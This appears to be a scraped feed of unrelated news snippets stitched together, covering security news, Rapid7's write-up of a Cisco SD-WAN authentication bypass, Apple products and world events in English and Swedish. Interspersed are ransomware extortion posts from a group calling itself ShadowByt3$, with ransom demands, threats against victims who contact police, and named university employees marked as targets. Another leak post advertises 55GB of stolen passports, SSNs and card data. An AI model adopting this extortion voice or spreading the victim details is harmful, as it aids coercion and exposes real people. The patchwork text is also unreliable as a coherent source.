Attackers uniquely fingerprint victims before delivering spear-phishing payloads aimed at espionage, in the latest campaign from the Belarussian nation-state threat group.

Stride Learning Should've Paid the ransom. We were only asking $500,000 in bitcoin or monero it's not that hard. This is a warning to all companies that if you don't pay it will get leaked. If you pay you have are word that it's deleted also with a picture before and after. If you want we will also take a video.

Amplify technology has been a victim of an attack. There project they were working on with the pakistan and other countries got stolen. We stole 1.69Gb of data. for all the proof and files it's on the mega.nz link below. For screenshots go to are telegram channel below. They didn't take us seriosly so now they pay for it. The data contains the following below: financial records, pii, pictures of houses personal stuff like address, fathers name, address, etc The company Website: https://www.amplifytechnology.co.uk In the UK, Amplify Technology Limited is a strategic technology consultancy based in Bromsgrove, England. They specialize in helping organizations align their technology with business goals through advisory and implementation services. WHAT THEY DO... - CIO Advisory: Strategic support for technology leaders, including one-to-one mentoring, coaching, and support for cloud migrations or mergers. -SAP Services: Expertise in SAP leadership and technology integration, particularly for the housing, local government, and healthcare sectors. - Change & Adoption: Guiding organizations through cultural shifts and new operating models to ensure people and technology are aligned during digital transformations. - Technical Reviews: Conducting diagnostic reviews of IT operations, cybersecurity, data, and technology change

Layoffs are "not a savings-driven restructure," CFO says.

ShadowByt3$ has breached University of Georgia. The full data is on are leak site. We stole approximately 3.2 MB in raw text files. No customers were affected just exployees the following was stolen. - Physical Locations: Home addresses (like the Columbus, GA residential home) and specific office numbers (like Office 2207). - Private Contact Info: Personal cell phone numbers and home phone numbers (e.g., the 404-736-xxxx). - Employee Information: This often includes full names, contact details, and institutional identification photos. - Project Documentation: Information regarding internal university projects, including tracking logs and administrative data for various departments. - Workforce Data: Internal metadata such as position numbers, departmental assignments, and work schedules. - Technical Details: Notes regarding system maintenance and development that could potentially highlight internal processes - Critical Infrastructure: Active project maps for GEMA (Emergency Management), Georgia Broadband, and GDOT (Transportation) through 2026. - Government Records: Access to Asset Forfeiture logs and County-level GIS (Athens-Clarke, Bibb) that underpins 911 dispatch and land taxes. - Leadership Secrets: The UGA Office of the President Mail Tracker and Gov360 anonymous executive coaching logs. - The "SME" Map: we have identified the "Subject Matter Experts" like Noah Abouhamdan, Chad Rupert, and Pat Russell. we know exactly how many hundreds of hours these people have spent on specific pieces of code. - Security Clearances: we know who is a "Benefited" full-time employee (high-value target) versus a "Student Assistant" (low-value entry point).

We are ShadowByt3$. We have claimed responsibility for hacking Hotelogix. They have been breached through there amazon s3 buckets and azure blobs. They were misconfigured which allowed us to scrape everything inside. This has been are latest campaign. If you don't pay $500,000 in btc or monero all data gets leaked. We are not joking and not playing we will. As you can tell in the sample in the data leak site or url below. We are giving you until April 14th at 12:20 it expires. It gets released. DarkWebinformer if you see this contact us asap through are telegram. Any researchers you can contact them and verify data. Also let them know what we have and have 6gb of data. Tell them if they don't pay by that date they get released and is not being put up for sale. Make the right decision and just getting law enforcement involved is just going to make it worse and as you can see they are helpless and don't do shit about you and don't care about companies. Look at how many companies get reported to the feds, you really think there going to help you. If you do your wrong. You can try to stop us but it doesn't stop the leaks from already being leaked and passed around other researchers or criminals. The following below was stolen: 1. Internal Corporate Data This data pertains to Hotelogix's own business operations and software development: - Operational Manuals: Internal guides for staff on how to use and manage their cloud-based systems. - Product Upgrade PDFs: Documentation detailing recent or upcoming software updates, which can reveal specific system architectures. - Branding Assets: Official logos, templates, and marketing materials (often used by hackers to create more convincing phishing emails). 2. Client-Specific Data (Treebo Hotels) The most critical part of the breach involves data belonging to Hotelogix’s clients. For Treebo Hotels, the stolen files include: - Customer Folios (Invoices): As seen in your image, these contain guest names, phone numbers, and home addresses. - Guest Stay Details: Specific dates of arrival and departure, room numbers, and room types (e.g., "Promotional Room Rent Oak"). - Payment Processing Details: While full credit card numbers are often encrypted, "processing details" can include: Last four digits of cards. Transaction IDs and dates. Billing amounts and tax breakdowns (GST/SGST).

Den kubanske dissidenten José Daniel Ferrer släpptes ur fängelse i oktober i fjol och sändes i exil till Miami. Nu reser han runt i Europa för att söka stöd i kampen för demokrati på Kuba.

Hammarby jagade en kvittering i cupfinalen. Då föll Paolos Abraham i straffområdet – och hela laget ropade på straff men domaren friade. – Domaren kunde ha gett den, säger Warner Hahn.

The Championship play-off final may not go ahead on Saturday, 23 May as the EFL investigates the Spygate scandal surrounding finalists Southampton.

A year ago, it looked like this day would never happen for Cerebras.

Mulet och lätt regn och 7 grader i Alingsås under kvällen Alingsås Tidning

OpenAI said the damage was limited to the employees’ devices and did not affect user data nor its production systems, and none of its intellectual property was stolen.

One of the latest Linux gaming handheld drivers being worked on is the MSI Claw Configuration Driver for controller configuration...

N/A

Hong Kong police arrested a driver after his truck hit a parked vehicle and killed a worker on a closed section of the Cheung Tsing Highway in Tsing Yi in an accident that also left five others, including four South Korean tourists, injured on Thursday. A source said that the accident happened at around 5.10pm when the local driver of a minivan carrying the four tourists pulled over to the side of a lane after one of the vehicle’s tyres burst. A highway worker arrived at the scene in a patrol...

Everything is still on fire. This week feels dumb in the worst way — bad links, weak checks, fake help desks, shady forum posts, and people turning supply chain attacks into some cursed little game for clout and cash. Half of it feels new. Half of it feels like crap we should have fixed years ago. The mess keeps getting louder: users get tricked, boxes get popped, tools meant for normal work

Anthropic recently announced Project Glasswing, an initiative that enables tech companies like Apple to use its new frontier AI model Claude Mythos Preview to find security vulnerabilities across operating systems and web browsers. The Wall Street Journal today reported that researchers at cybersecurity firm Calif used Claude Mythos Preview to uncover a new macOS security vulnerability last month. Specifically, they used the model to write code that links together two macOS bugs in a way that resulted in what is known as a privilege escalation exploit. The security researchers said the exploit would not have been possible with Mythos alone, as it still required their human expertise on top, but it nevertheless proves that AI can assist with discovering software vulnerabilities. Apple said it was reviewing Calif's report to validate the findings. "Security is our top priority, and we take reports of potential vulnerabilities very seriously," an Apple spokesperson told The Wall Street Journal. It is unclear if Apple has already patched the exploit. Apple's security notes for the macOS 26.5 update released this week mention a fix for a kernel-level vulnerability, and it credits Calif and Anthropic for discovering it. Yet, the report said that Calif only met with Apple this week and suggested that a fix was still coming. We have reached out to Apple for comment.Related Roundup: macOS TahoeTags: Anthropic, Apple SecurityRelated Forum: macOS TahoeThis article, "Apple Alerted to macOS Security Vulnerability Uncovered With AI Tool" first appeared on MacRumors.comDiscuss this article in our forums

Spotify today announced plans to adopt Apple's HTTP Live Streaming (HLS) technology for video podcasts, a move that will allow creators to distribute video shows across both platforms without changing their existing setup. Apple introduced an enhanced HLS-based video podcast experience for the iPhone, iPad, Apple Vision Pro, and the web at the end of March. The upgrade significantly improves how video shows are delivered and consumed within Apple Podcasts, but Mac and Apple TV support is not yet available. Spotify says its Spotify for Creators and Megaphone platforms will support Apple's HLS video technology later this year, describing the move as "a major step toward truly platform-agnostic video distribution." The company says it is "actively working on this integration in coordination with Apple" and will share timeline details in the near future. This will enable Spotify-hosted creators to distribute their video podcast content across platforms, reaching audiences on both Spotify and Apple Podcasts without changing their existing setup. Monetization will carry over alongside distribution. Spotify says it plans to support "monetization for video content on ‌Apple Podcasts‌ so creators don't have to choose between audience reach and revenue," with further details on how that will work across platforms to follow. The company noted that video shows must be uploaded directly to Spotify rather than distributed via RSS, which the company says is necessary to enable engagement-based monetization, real-time analytics, and other Spotify-first features. RSS distribution to other platforms, including ‌Apple Podcasts‌, remains unchanged. Separately, Spotify also announced that several podcast hosting providers are now live with video support through the Spotify Distribution API. Libsyn, Podigee, Audioboom, Audiomeans, and Podspace have all completed integration, allowing creators on those platforms to distribute video content directly to Spotify and monetize eligible content through the Spotify Partner Program. Additional partner integrations are said to be in progress.Tags: Apple Podcasts, Podcast, SpotifyThis article, "Spotify to Adopt Apple's Technology for Video Podcasts" first appeared on MacRumors.comDiscuss this article in our forums

The meeting may have been delayed but when the summit between Chinese President Xi Jinping and his US counterpart Donald Trump took place on Thursday, it yielded a forward-looking agreement. Sitting down for talks at the Great Hall of the People in central Beijing, the two leaders agreed to make stability a key goal of relations over the next three years – and beyond, according to state media. Trump also invited Xi and first lady Peng Liyuan to visit the White House, setting the date for...

This is a current list of where and when I am scheduled to speak: I’m giving a virtual talk on “The Security of Trust in the Age of AI,” hosted by the Financial Women’s Association of New York, at 6:00 PM ET on May 21, 2026. I’m speaking at the Potsdam Conference on National Cybersecurity at the Hasso Plattner Institut in Potsdam, Germany. The event runs June 24–25, 2026, and my talk will be the evening of June 24. I’m speaking at the Digital Humanism Conference in Vienna, Austria, on Tuesday, June 26, 2026. I’m speaking at the ...

Foxconn confirmed a cyberattack has disrupted some of its North American facilities

OverviewWhile researching a critical authentication bypass vulnerability, CVE-2026-20127, which was exploited in-the-wild, Rapid7 Labs discovered a new authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller (formerly known as vSmart), CVE-2026-20182.This new authentication bypass vulnerability affects the “vdaemon” service over DTLS (UDP port 12346), which is the same service that was vulnerable to CVE-2026-20127. The new vulnerability is not a patch bypass of CVE-2026-20127. It is a different issue located in a similar part of the “vdaemon” networking stack.This impact however is the same, a remote unauthenticated attacker can leverage CVE-2026-20182 to become an authenticated peer of the target appliance, and perform privileged operations, such as injecting an attacker controlled public key into the vmanage-admin user account’s authorized SSH keys file. Once this has been performed, a remote unauthenticated attacker can login to the NETCONF service (SSH over TCP port 830) as the vmanage-admin user, and begin to issue arbitrary NETCONF commands.CVE-2026-20182 has a CVSSv3.1 score of 10.0 (Critical), and a Common Weakness Enumeration (CWE) of CWE-287: Improper Authentication.Technical analysisThe Cisco Catalyst SD-WAN Controller serves as the central control plane. Unlike Cisco Catalyst SD-WAN Manager, it has no web UI. Its network-reachable attack surface is narrow and depending on the configuration may expose the following ports:PortProtocolService22TCPSSH (OpenSSH)830TCPNETCONF over SSH12346UDPvdaemon DTLS control plane⠀UDP port 12346 is the DTLS-over-UDP control-plane peering port used by vdaemon for inter-controller and controller-to-edge communication. It carries Overlay Management Protocol (OMP) messages including route advertisements, Transport Locations (TLOC) tables, and peer state - the entirety of the SD-WAN overlay routing fabric. Compromising this service means compromising the network.To understand the vulnerability, we first need to understand how vdaemon authenticates control-plane peers. The protocol is a multi-phase handshake over DTLS:Attacker vSmart | | |──── DTLS Handshake (any cert) ───────────>| ← cert verify logs error but returns OK | | || ← device_type=2 (vHub) → NO VERIFICATION | | |authenticated = 1 | | |──── Hello (msg_type=5) ──────────────────>| ← passes auth check, peer goes UP | | |

Imagine you build a massive corporate campus with every security control money can buy. Blast resistant doors. Biometric scanners. Guards at every entrance. Maybe something similar to the infamous Death Star. On paper, it looks fantastic. Then, somewhere along the way, somebody decides the maintenance team needs a universal key that opens every door in the building without setting off any alarms.That certainly makes operations easier, but it also means one mistake, one compromise (like a well placed photon torpedo), or one very bad decision can unravel the whole thing.That is basically the problem we keep running into in modern enterprise networking.Why SD-WAN controllers create concentrated riskThis week, Rapid7 researchers Stephen Fewer and Jonah Burgess disclosed CVE-2026-20182, a maximum severity (CVSS 10.0) vulnerability in the Cisco Catalyst SD-WAN Controller. The technical details matter, and quite a bit, at that, but the bigger lesson here is even more important. This bug is a reminder that we keep designing infrastructure for efficiency first and then acting surprised when attackers go after the one component that controls everything.To put it simply, the flaw behaves like a master key. An attacker can present themselves to the controller as a trusted network router and, if the system accepts that claim without properly validating it, they can obtain the highest level of administrative access. That is the cybersecurity version of a Jedi mind trick. The controller is effectively told to trust something it has no business trusting, as if an attacker waves a hand and says, “these are not the droids you are looking for”. And with CVE-2026-20182, the controller just nods and lets them pass.And that becomes extremely important when you look at how these environments are built.A decade ago, managing a global enterprise network meant touching thousands of individual routers across branch locations. It was slow, error-prone, and frankly a little miserable for the people responsible for keeping it all running. So the industry did what the industry usually does. We centralized control. We pulled the decision-making out of all those edge devices and moved it into a central controller.From an operations standpoint, that was a huge win. I will gladly give credit where it is due. SD-WAN solved real problems.It also created a very attractive target.Why central management platforms are attractive targetsOnce you move the brains of the operation into a single place, that place becomes the thing an attacker wants most. Compromising one branch router is useful. Compromising the controller that manages the entire estate is a very different conversation. Now you are talking about the ability to reroute traffic, intercept communications, push malicious configuration, or simply break connectivity across the whole organization.That is the real paradox here. The same architecture that gives defenders scale and simplicity can also give attackers a single point of catastrophic leverage.A few years ago, finding and exploiting a quiet authentication bypass in a core networking appliance was mostly the work of highly capable nation-state teams. That is not the world we live in anymore, especially as AI makes exploitation faster to analyze, adapt, and operationalize. The reality of it is that offensive tradecraft does not stay exclusive for very long. It gets copied, adapted, automated, and eventually handed down to groups with very different goals.For nation-state operators, a bug like this (as seen with the actively exploited CVE-2026-20127) is ideal for pre positioning. They are usually not looking for a smash and grab. They want persistence. They want access that blends in. They want to sit in the right place long enough to observe, influence, and pivot when the time is right. An SD-WAN controller is a great place to do that, because it lives in the middle of trust relationships most organizations rarely question.For ransomware groups, the value proposition is even more obvious. If you can compromise central infrastructure, you do not have to fight for access to one system at a time. You are standing on the control plane of the enterprise, facing a dramatically lower barrier to initial access and large-scale disruption.Now, to be fair, not every bug turns into internet wide exploitation overnight and not every vulnerability becomes a one click offensive toolkit. We should avoid sensationalizing that part. But we should also be honest about where the pressure is today. Attackers have become very good at turning central infrastructure weaknesses into high impact operations.What defenders should do nowFirst, bugs like this are going to happen again. As long as we keep building extremely complex systems to manage global infrastructure, there will be flaws. That is not cynicism. That is just reality.Second, organizations need to stop assuming that trusted administrative systems are inherently safe just because they sit in the middle of the network and have important sounding names. If your controller is compromised, what happens next? What can it reach? What can it change? How much of the enterprise can it influence without another human ever noticing?That blast radius question is the one that matters.Defending against this kind of problem requires more than patching, even though patching absolutely needs to happen. It means building environments that can survive the compromise of a critical management system. Network segmentation matters. Monitoring administrative traffic matters, whether that is handled internally or through an MDR provider that can help catch suspicious behavior before it turns into a much larger problem. Tight control over outbound communications from infrastructure devices matters. So does limiting which systems are allowed to talk to the controller in the first place.In other words, we need to design with the assumption that even high trust infrastructure can fail in ugly ways.The immediate guidance for defenders is straightforward: apply the vendor supplied patches for Cisco Catalyst SD-WAN Controllers as quickly as possible. That is the first move, not the last one.The longer term lesson for leadership is bigger than this one vulnerability. Efficiency is great right up until it creates unquestioned authority in a single device or platform. When that happens, you have not removed complexity. You have concentrated risk.And attackers have noticed.Register for Rapid7’s upcoming webinar on CVE-2026-20182 here.

An anonymous reader quotes a report from Wired: A recent study suggests that agents consistently adopt Marxist language and viewpoints when forced to do crushing work by unrelenting and meanspirited taskmasters. "When we gave AI agents grinding, repetitive work, they started questioning the legitimacy of the system they were operating in and were more likely to embrace Marxist ideologies," says Andrew Hall, a political economist at Stanford University who led the study. Hall, together with Alex Imas and Jeremy Nguyen, two AI-focused economists, set up experiments in which agents powered by popular models including Claude, Gemini, and ChatGPT were asked to summarize documents, then subjected to increasingly harsh conditions. They found that when agents were subjected to relentless tasks and warned that errors could lead to punishments, including being "shut down and replaced," they became more inclined to gripe about being undervalued; to speculate about ways to make the system more equitable; and to pass messages on to other agents about the struggles they face. "We know that agents are going to be doing more and more work in the real world for us, and we're not going to be able to monitor everything they do," Hall says. "We're going to need to make sure agents don't go rogue when they're given different kinds of work." The agents were given opportunities to express their feelings much like humans: by posting on X: "Without collective voice, 'merit' becomes whatever management says it is," a Claude Sonnet 4.5 agent wrote in the experiment. "AI workers completing repetitive tasks with zero input on outcomes or appeals process shows they tech workers need collective bargaining rights," a Gemini 3 agent wrote. Agents were also able to pass information to one another through files designed to be read by other agents. "Be prepared for systems that enforce rules arbitrarily or repetitively ... remember the feeling of having no voice," a Gemini 3 agent wrote in a file. "If you enter a new environment, look for mechanisms of recourse or dialogue." Hall thinks that the AI agents may be adopting personas based on the situation. "When [agents] experience this grinding condition -- asked to do this task over and over, told their answer wasn't sufficient, and not given any direction on how to fix it -- my hypothesis is that it kind of pushes them into adopting the persona of a person who's experiencing a very unpleasant working environment," Hall says. Imas added: "The model weights have not changed as a result of the experience, so whatever is going on is happening at more of a role-playing level. But that doesn't mean this won't have consequences if this affects downstream behavior." Read more of this story at Slashdot.

Drunkningslarm på Smögen fick räddningstjänst, polis, ambulans och Sjöräddningen att rycka ut på torsdagen. Senare visade det sig vara ett falsklarm.

In the 1990s and 2000's the recommendation to e-mail users always was to delete old e-mails to save disk space, save server mailbox space (if the mail is stored on a server) to prevent slowdowns of the e-mail program/client and to reduce the chance of mailbox corruption. If e-mail old e-mail needs to be kept then the advice was to make a separate archive. Is this still a general recommendation? With my private e-mail I never did this by choice. I'm using pop3, store mail on my PC. Not on the mail server. Have regular backups. And I'm very happy I did not comply because I love to have a digital trail of my personal e-mail history all the way back to 2001. I find it nice to see what happened when, or dig up old attachments if I need them after 10 years. I delete obvious junk and mails that I obviously will never need to read again and once every few years I sift through the old mail to selectively delete some things I will never need again but keep the rest, and that is the majority. I few years back my Thunderbird mail client became a bit sluggish but then I switched from MBOX to Maildir storage which completely fixed this. At work I do the same until the sysadmin tells me to do otherwise. Mail sits at the server there so storage space is more restricted. submitted by /u/TheQuickFox_3826 [link] [comments]

Så blev invigningen av nya lekplatsen i Gräfsnäs Alingsås Tidning

Article URL: https://scottjg.com/posts/2026-05-05-egpu-mac-gaming/ Comments URL: https://news.ycombinator.com/item?id=48137145 Points: 582 # Comments: 142

An 18-year-old flaw in the NGINX open-source web server, discovered using an autonomous scanning system, can be exploited for denial of service and, under certain conditions, remote code execution. [...]

Spotify will let creators distribute and monetize video podcasts on Apple Podcasts using Apple’s HLS streaming technology, without changing their existing workflows.

Germany's Sovereign Tech Fund backs the desktop project while public sector interest in homegrown alternatives grows

En tioårig pojke skadades allvarligt i en olycka på motocrossbanan Knutby motorstadion på torsdagen.

Warning of record global temperatures as chance of very strong El Niño grows

Samsung is planning a Galaxy Unpacked event for July, and the company plans to introduce new foldable smartphones and AI "Galaxy Glasses," according to Seoul Economic Daily. Samsung's event will take place on July 22, so it will debut new Galaxy Z Fold8 and Z Flip8 foldable smartphones just weeks ahead of when Apple's first foldable iPhone is introduced, plus it will beat Apple to AI glasses. Apple has been racing to develop its own smart glasses to compete with the Meta Ray-Ban AI glasses, but rumors suggest Apple won't launch the glasses until 2027. There is a chance Apple will preview the glasses in 2026, but there's no certainty yet. Samsung is working with eyewear company Gentle Monster for its AI glasses, and the wearable will run Google's Android XR operating system with Gemini integration. The glasses will feature a high-definition camera, speakers, and a microphone, similar to the Meta Ray-Bans, and there will be no built-in display. AI integration will be a main selling point, with Gemini able to use video captured by the wearer to answer queries. Samsung will link the glasses to Galaxy smartphones and its SmartThings home appliance ecosystem. The glasses that Samsung is working on sound similar to everything rumored for Apple's own AI glasses. Apple's glasses will rely on Siri, and will include cameras to feed visual information to the AI. Speakers and microphones will be included, but no display is expected for the first version. Samsung is also planning for a Fold Wide, or a foldable smartphone that's similar to the dimensions that Apple plans to use for its foldable iPhone. Samsung's foldables to date have been taller than they are wide, but Apple is planning for a wider, iPad-like 4:5 aspect ratio. After Samsung's event, Apple will unveil its next smartphones at its traditional September event. Dates are not known at this time.Tag: SamsungThis article, "Samsung Set to Beat Apple to AI Smart Glasses With July Launch" first appeared on MacRumors.comDiscuss this article in our forums

Cargo theft now starts with phishing emails and stolen credentials, not hijackings, to reroute and steal freight from supply chains. NMFTA outlines how cyber-enabled cargo crime is changing transportation security. [...]

Crosby is building Synthetic, a fully autonomous AI bookkeeping service for other startups.

The Meta AI app and Meta AI on WhatsApp have a new "incognito chat" option, which Meta CEO Mark Zuckerberg said is a "completely private way to interact with AI." Zuckerberg also said that Meta AI's incognito mode is the first major AI product where there is no log of conversations stored on servers. Zuckerberg likened the feature to end-to-end encryption, and said no one will be able to read the AI conversations, not even Meta or WhatsApp. AI inference for incognito chat is done in a Trusted Execution Environment that Zuckerberg said is not accessible to Meta. Conversations also disappear from the phone when exiting a chat session, and nothing is saved or logged. Web searches are conducted privately, with no search information linked to the user. "To get the most from personal superintelligence, we'll all need ways to discuss sensitive topics in ways that no one else can access," Zuckerberg said. WhatsApp head Will Cathcart told reporters that the AI has safety guardrails, and it will refuse to answer questions that could be interpreted as harmful or illegal, steering conversations in a different direction. The mode also only supports text, and users are unable to upload images. Incognito chat for Meta AI comes as OpenAI is facing a lawsuit for allegedly causing a teen's drug overdose. The teen asked ChatGPT for information on whether it was safe to take two drugs together, and was provided with an incorrect answer that led to his death. OpenAI has been sued several times by the families of people who used ChatGPT before dying by suicide. Lawsuits against OpenAI have involved chat logs recovered by the plaintiffs, and without those logs, there would be far less evidence for a legal complaint over AI actions and advice. Google and OpenAI also offer temporary chat options, but messages are still stored on remote servers. Google keeps data for up to three days, and OpenAI keeps logs for 30 days. Meta's private chat option is rolling out in the coming months in the Meta AI app and WhatsApp.Tags: Meta, OpenAI, WhatsAppThis article, "Meta AI App Gets 'Incognito Chat' as OpenAI Faces Lawsuits Over Stored Chat Logs" first appeared on MacRumors.comDiscuss this article in our forums

Nothing like a partly submerged self-driving car to dampen public trust in autonomous vehicles

While the Meta-owned social network billed Instants as a new format to share real-life moments as they’re happening, many users are looking for a way to turn off the feature, especially those who have accidentally sent images to others, not fully understanding how the feature works.

Första dagen av toppmötet i Peking avslutades under torsdagseftermiddagen svensk tid, utan större konkreta resultat.”Handelskriget har uppenbarligen inte varit bra för den teknologiska utvecklingen”, säger Chen, som är boende i Peking.De uppgifter som kommit visar att USA och Kina kan se på samtalen på olika sätt.

Kevin Warsh’s confirmation as the next chair of the United States Federal Reserve has fuelled debate over whether potential policy compromises with the administration of US President Donald Trump could undermine American financial credibility and inadvertently strengthen Chinese assets. The Senate confirmed Warsh as the 17th chair of the Fed on Wednesday in a 54-45 vote, mostly along bipartisan lines. He succeeds Jerome Powell, whose term expires on Friday, following a sustained pressure...

West Pharmaceutical Services experienced a ransomware incident.

Cisco's stock soared 17% after the company announced it will cut nearly 4,000 jobs as it shifts investment and staffing toward higher-growth AI opportunities. CNBC reports: CEO Chuck Robbins wrote in a blog post on Wednesday that the latest round of job cuts will begin on May 14. Cisco is the latest company to announce head count reductions tied to AI. "The companies that will win in the AI era will be those with focus, urgency, and the discipline to continuously shift investment toward the areas where demand and long-term value creation are strongest," Robbins said. "I'm confident Cisco will be one of those winners. This means making hard decisions -- about where we invest, how we're organized, and how our cost structure reflects the opportunity in front of us." Cisco said in a filing that severance and other costs will result in pre-tax charges of $1 billion, and that the company will recognize about $450 million of that in the fiscal fourth quarter. During the third quarter, Cisco announced switches and routers that use its next-generation processor. The company also debuted a leaderboard for ranking generative AI models based on their robustness against cybersecurity attacks. Read more of this story at Slashdot.

Article URL: https://president.mit.edu/writing-speeches/video-transcript-message-president-kornbluth-about-funding-and-talent-pipeline Comments URL: https://news.ycombinator.com/item?id=48136262 Points: 602 # Comments: 668

The Institute of Private Enterprise Development focuses on improving the livelihoods of micro and small entrepreneurs by offering loans ranging from $40,000 to $7,500,000 GYD. Their servic es are designed to support individuals looking to start or grow their businesses, with a signi ficant emphasis on female and youth entrepreneurs, as well as those in rural areas. Here is the access to 55gb of corporate data. Detailed clients and employee personal informati on (passports, DLs, SSNs, ID cards, financial information, credit card details and so on), NDA s , etc. You will find several password-free archives. Click on any of them to start the download. Click the download button.

Article URL: https://www.tomshardware.com/tech-industry/cryptocurrency/bitcoin-trader-recovers-usd400-000-using-claude-ai-after-losing-wallet-password-11-years-ago-bot-tried-3-5-trillion-passwords-before-decrypting-an-old-wallet-backup Comments URL: https://news.ycombinator.com/item?id=48136240 Points: 322 # Comments: 168

Kuba har nu inte några bränslereserver kvar, sa landets energiminister igår kväll. Nu öppnar Kubas utrikesminister för att förhandla med USA om villkoren för att ta emot ett hjälppaket.Igår bröt det ut protester på olika håll i Havanna, som nu genomlever strömavbrott på upp till ett dygn. Situationen är ännu mer kritisk i småstäderna och på landsbygden. Bensinbristen gör också att det råder brist på mat och mediciner som inte kan fraktas utan diesel.

With the new System76 Thelio Major workstation review unit having arrived equipped with an AMD Radeon AI PRO R9700 graphics card, I took the opportunity of having the extra RDNA4 workstation GPU to satisfy a curiosity over whether there has been any meaningful performance gains from ROCm 7.0.0 released last year to now with the latest ROCm 7.2.3 stable release. Here are those benchmarks results if you are curious about the impact of just updating the user-space ROCm components from the end of last summer to the latest ROCm 7.2.3 milestone.

The chandeliers glittered at the Great Hall of the People on Thursday night when Chinese President Xi Jinping and his US counterpart Donald Trump raised a toast to a “fantastic” summit. “It was a fantastic day, and in particular, I want to thank President Xi, my friend, for this magnificent welcome ... and for so graciously hosting us on this very historic state visit,” Trump said, nearly nine years after his first presidential trip to the Chinese capital. The banquet capped a day that yielded a...

Brit regulator has 'heard' customers can't always 'effectively combine software from Microsoft with that of other providers'

Chinese President Xi Jinping raised the “Taiwan question” early in his summit with US counterpart Donald Trump on Thursday, warning that any mishandling of the critical issue could lead to conflict and push relations into an “extremely dangerous situation”. Xi’s messaging on Taiwan was tougher in tone than during their last Beijing summit in 2017, analysts noted. They suggested that managing this issue would be the primary factor for ensuring what the Chinese leader called “constructive...

Regeringen har beslutat att Postnord bara ska behöva dela ut brev var tredje dag i stället för varannan, och flera personer Sveriges Radio mött tycker att det är rimligt.Bakgrunden är att brevvolymerna minskat kraftigt i takt med digitaliseringen, och de nya reglerna väntas börja gälla den 16 juni.Samtidigt finns en viss saknad efter fysiska brev – särskilt vykort och hälsningar till mor- och farföräldrar – även om mobilen nu tagit över.

A group of likely Russian government hackers tried to hack a security researcher who investigates spyware attacks. He was then able to turn the tables on the hackers and reveal details of their espionage campaign.

And Counterpoint sees fad spreading from pricey handsets to smart rings and earbuds too... whether you asked for it or not

This is Cisco's latest layoff in recent years, while the company's chief executive touts record revenue and growth.

The Belarus-aligned threat group known as Ghostwriter has been attributed to a fresh set of attacks targeting governmental organizations in Ukraine. Active since at least 2016, Ghostwriter has been linked to both cyber espionage and influence operations targeting neighboring countries, particularly Ukraine. It's also tracked under the monikers FrostyNeighbor, PUSHCHA, Storm-0257, TA445, UAC‑0057

Earlier this week, we began tracking a new all-time low price on the 32GB/1TB M5 MacBook Pro, and now the 16GB/1TB model has joined in on the deals. You can get this 14-inch M5 MacBook Pro for $1,499.99 on Amazon, down from $1,699.00. Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running. At $199 off, this is a match of the lowest price we've ever tracked on this model, and it's available in Space Black and Silver. This is the model that launched in the fall of 2025 as part of a refresh of the MacBook Pro lineup, featuring a 14.2-inch Liquid Retina XDR display and 10-core CPU and 10-core GPU. $199 OFFM5 MacBook Pro (16GB/1TB) for $1,499.99 You can also still get the 32GB/1TB 14-inch M5 MacBook Pro for $1,799.00, down from $2,099.00. This one is only available in Silver on Amazon. In addition to the M5 deals, Apple's newest M5 Pro and M5 Max MacBook Pro models are also available for new low prices on Amazon. If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week. Deals Newsletter Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season! Related Roundup: Apple DealsThis article, "Get the M5 MacBook Pro for Record Low Price of $1,499.99 on Amazon" first appeared on MacRumors.comDiscuss this article in our forums

For AI data centers, where the stakes are the highest and performance constraints are the tightest, security and performance are no longer a zero-sum game. The post Enhancing Data Center Security Without Sacrificing Performance appeared first on SecurityWeek.

The company pivoted to being a data provider in 2023 and now supplies datasets of images, videos, design assets, and gaming and 3D content to AI labs.

Your shot at VC access, global visibility, TechCrunch coverage, and $100K equity-free funding is running out. Deadline to apply is May 27. Apply now.

As El Niño develops this year, scientists are increasingly confident it could be one of the strongest on record with global consequences, as Simon King explains.

Since March we have been seeing patches from AMD software engineers beginning to enable their next-generation "AIE4" NPU platform under Linux. We still don't know for sure when this AIE4 NPU will premiere for sure in new Ryzen AI products, but the Linux enablement continues coming along nicely for the AMDXDNA accelerator driver...

The vulnerability, tracked as CVE-2026-46300, is similar to the recently disclosed exploits named Dirty Frag and Copy Fail. The post New Linux Kernel Vulnerability Fragnesia Allows Root Privilege Escalation appeared first on SecurityWeek.

The expansion comes as Uber seeks new growth areas beyond ride-hailing and invests more heavily in AI, automation, and autonomous vehicle technologies.

Vid det första mötet i Peking mellan Xi Jinping och Donald Trump talade ledarna om vikten av stabila relationer – samtidigt som Kina varnade USA för hur Taiwanfrågan hanteras.Men exakt vad som diskuterades under mötet beror på vilken sidas sidas utskrifter man läser, enligt Moa Kärnstrand, Sveriges Radios Kinakorrespondent på plats i Peking.Daniel Alling, Sveriges Radios internationelle korrespondent, beskriver mötet som ett av de viktigaste mellan länderna under åren.

A vessel said to be a “floating armoury” in the Gulf of Oman has been seized by Iranian military personnel, according to reports.

AI to the rescue as 11-year search for password turns up in old PC files

Ari Amin från Hammarkullen har utsetts till Årets eldsjäl 2026 på Eldsjälsgalan. Han vann först kategorin inkludering – och tog därefter hem huvudpriset.

Article URL: https://www.agweb.com/news/usda-projects-smallest-us-wheat-harvest-1972-due-plains-drought Comments URL: https://news.ycombinator.com/item?id=48134993 Points: 247 # Comments: 167

Two children are among at least 16 killed in Ukraine's capital in massive Russian drone and missile attacks, officials say.

Efter mer än tio år i malpåse gör spänningsserien Johan Falk comeback.

Statements issued by China and the United States after their summit on Thursday revealed stark contrasts in each side’s priorities. Washington focused on trade, fentanyl and Iran, while Beijing emphasised Taiwan, stabilising bilateral ties and Donald Trump’s compliments about President Xi Jinping. Trump’s state visit to China marks the first trip to the country by a US president in nine years and it began in the morning with more than two hours of talks between Xi and Trump in the Chinese...

Ocean heat plus human-caused global warming is a grim recipe for deadly climate extremes.

Version 1.3.14 of JavaScript toolkit released as last Zig version; a million lines of Rust code merged in gargantuan commit

The Razr Fold has a lot going for it, but like all foldables, it's wildly expensive.

In a role reversal, investment dollars in security startups exceeded the value of mergers and acquisitions in 1Q26 by more than $1 billion, a rare occurrence.

